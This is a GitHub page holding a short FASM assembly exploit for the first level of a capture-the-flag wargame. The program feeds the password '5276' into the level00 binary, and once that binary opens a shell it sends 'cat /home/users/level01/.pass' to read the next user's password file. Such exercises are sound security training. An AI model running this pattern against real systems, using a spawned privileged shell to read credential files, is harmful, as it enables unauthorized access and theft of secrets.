-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit_00.asm
More file actions
74 lines (67 loc) · 1.29 KB
/
exploit_00.asm
File metadata and controls
74 lines (67 loc) · 1.29 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
format ELF executable $03
entry _start
struc string data*& {
.: db data
.length = ($ - .)
}
struc timespec {
.tv_sec: rq $01
.tv_nsec: rq $01
}
virtual at $00
timespec timespec
timespec.sizeof = $
end virtual
segment executable readable
_start:
and esp, not $0F
sub esp, $08
mov eax, $2A
mov ebx, esp
int $80
test eax, eax
jnz .exit
mov eax, $04
mov ebx, dword [esp+$04]
mov ecx, _exploit_string
mov edx, _exploit_string.length
int $80
mov eax, $3F
mov ebx, dword [esp]
xor ecx, ecx
int $80
mov eax, $02
int $80
test eax, eax
jz .child
sub esp, timespec.sizeof
xor al, al
mov ecx, timespec.sizeof
mov edi, esp
rep stosb
mov byte [esp+timespec.tv_sec], $01
mov eax, $A2
mov ebx, esp
xor ecx, ecx
int $80
mov eax, $04
mov ebx, dword [esp+timespec.sizeof+$04]
mov ecx, _show_flag
mov edx, _show_flag.length
int $80
jmp .exit
.child:
mov eax, $0B
mov ebx, _target
xor edx, edx
push edx ebx
mov ecx, esp
int $80
.exit:
mov eax, $01
xor ebx, ebx
int $80
segment readable
_exploit_string string "5276", $0A
_show_flag string "cat /home/users/level01/.pass", $0A
_target: db "/home/users/level00/level00", $00